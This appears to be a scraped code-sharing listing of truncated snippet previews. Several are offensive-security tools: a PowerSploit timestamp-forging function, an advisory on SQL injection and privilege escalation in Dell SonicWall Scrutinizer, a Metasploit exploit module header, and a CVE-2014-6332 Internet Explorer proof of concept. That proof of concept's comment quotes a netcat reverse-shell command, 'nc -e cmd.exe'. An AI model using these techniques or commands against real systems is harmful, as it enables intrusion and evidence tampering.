This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Set-MacAttribute { | |
<# | |
.SYNOPSIS | |
Sets the modified, accessed and created (Mac) attributes for a file based on another file or input. | |
PowerSploit Function: Set-MacAttribute | |
Author: Chris Campbell (@obscuresec) | |
License: BSD 3-Clause | |
Required Dependencies: None |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import lxml.etree as etree | |
class CollectorTarget(object): | |
def __init__(self): | |
self.events = [] | |
self.urls = 0 | |
def start(self, tag, attrib): | |
#self.events.append("start %s %r" % (tag, dict(attrib))) | |
if tag == 'url': |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Dell Scrutinizer 11.01 several vulnerabilities | |
http://www.mysonicwall.com has a trial available. | |
Dell Sonicwall Scrutinizer suffers from several SQL injections, many of which can end up with | |
remote code execution. An attacker needs to be authenticated, but not as an administrator. | |
However, that wouldn’t stop anyone since there is also a privilege escalation vulnerability in that | |
any authenticated user can change any other user’s password, including the admin. One SQL | |
injection, which a Metasploit module was provided for, requires this privilege escalation to reach | |
since it exists in the new user mechanism only available to admins. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This module requires Metasploit: http//metasploit.com/download | |
## | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = ExcellentRanking |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var http = require('http'); | |
function parseSwitch(req){ | |
var list = {}, | |
rc = req.headers.cookie; | |
rc && rc.split(';').forEach(function( cookie ) { | |
var parts = cookie.split('='); | |
list[parts.shift().trim()] = unescape(parts.join('=')); | |
}); | |
return list; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#ifndef UNICODE | |
#define UNICODE | |
#endif | |
#include <Windows.h> | |
#include <string.h> | |
#include <stdio.h> | |
#include <Psapi.h> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#ifndef UNICODE | |
#define UNICODE | |
#endif | |
#include <Windows.h> | |
#include <string.h> | |
#include <stdio.h> | |
#include <Psapi.h> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
local coroutine = require "coroutine" | |
local io = require "io" | |
local math = require "math" | |
local nmap = require "nmap" | |
local shortport = require "shortport" | |
local sslcert = require "sslcert" | |
local stdnse = require "stdnse" | |
local string = require "string" | |
local table = require "table" | |
local tls = require "tls" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<!-- | |
CVE-2014-6332 PoC to bypass IE protected mode if enabled (with localhost) then get shell | |
The PoC drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
'server_ip' and 'server_port' in javascript below determined the connect back target | |
Tested on | |
- IE11 + Windows 7 64-bit (EPM is off) | |
- IE11 + Windoes 8.1 64-bit (EPM is off) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class GeometryNumber { | |
[double]$Number | |
GeometryNumber() {} | |
GeometryNumber($Number) { $this.Number=$Number } | |
[GeometryNumber] Sqrt() { return [GeometryNumber]::new([Math]::Sqrt($this.Number)) } | |
[GeometryNumber] Reciprocal() { return [GeometryNumber]::new(1/$this.Number) } | |
[GeometryNumber] TangetAngle() { return [GeometryNumber]::new([System.Math]::Atan($this.Number)) } | |
[GeometryNumber] AsDegrees() { return [GeometryNumber]::new($this.Number*180/[Math]::PI) } |
OlderNewer